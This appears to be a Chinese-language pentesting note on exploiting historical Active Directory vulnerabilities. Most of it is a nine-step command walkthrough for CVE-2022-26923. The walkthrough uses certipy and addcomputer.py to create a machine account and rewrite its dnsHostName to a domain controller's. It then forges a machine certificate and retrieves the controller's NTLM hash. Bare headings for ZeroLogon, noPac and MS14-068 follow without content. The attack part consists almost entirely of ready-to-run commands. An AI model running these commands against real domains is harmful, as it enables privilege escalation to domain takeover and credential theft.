历史漏洞的利用
CVE-2022-26923 证书服务提权漏洞
CVE-2022–26923 允许攻击者修改 DnsHostName 属性,该属性指定在 DNS 中注册的计算机名称,然后使攻击者能够从 AD 证书服务获取证书,从而导致特权提升。
1:使用certipy (https://github.com/ly4k/Certipy) 工具为低权限的域用户申请一个证书
certipy req 'med-factory/user_test:Password123#@cert01.med-raven.local' -ca MY-DOMAIN-HOSTNAME-CA -template User
2:测试证书与是否有效以及它是否可以通过 Certipy 用于 Kerberos 身份验证
certipy auth -pfx user_test.pfx
3:在域内增加一个新的主机
addcomputer.py 'my.domain.com/user_test:Password123#' -method LDAPS -computer-name 'NEW_PC' -computer-pass 'Password123#'
4:让我们为我们创建的新计算机生成一个证书。 要使用该计算机的机器帐户,需要在名称末尾添加一个“$”
certipy req 'my.domain.com/NEW_PC$:Password123#@hostname.my.domain.com' -ca MY-DOMAIN-HOSTNAME-CA -template Machine
5:在被拿下的主机上,更新dnshostname以及spn属性
Get-ADComputer NEW_PC -properties dnshostname,serviceprincipalname
6:移除现有SPN属性
Set-ADComputer NEW_PC -ServicePrincipalName @{}
7:将dnshostname值设置为DC的
Set-ADComputer NEW_PC -DnsHostName HOSTANME.my.domain.com
8:在攻击主机上伪造一个恶意证书
certipy req 'my.domain.com/NEW_PC$:Password123#@hostname.my.domain.com' -ca MY-DOMAIN-HOSTNAME-CA -template Machine
9:验证证书是否工作并且返回NTLM哈希
certipy auth -pfx hostname.pfx
CVE-2020-1472 ZeroLogon漏洞
CVE-2021-42278 NoPAC漏洞
MS14-068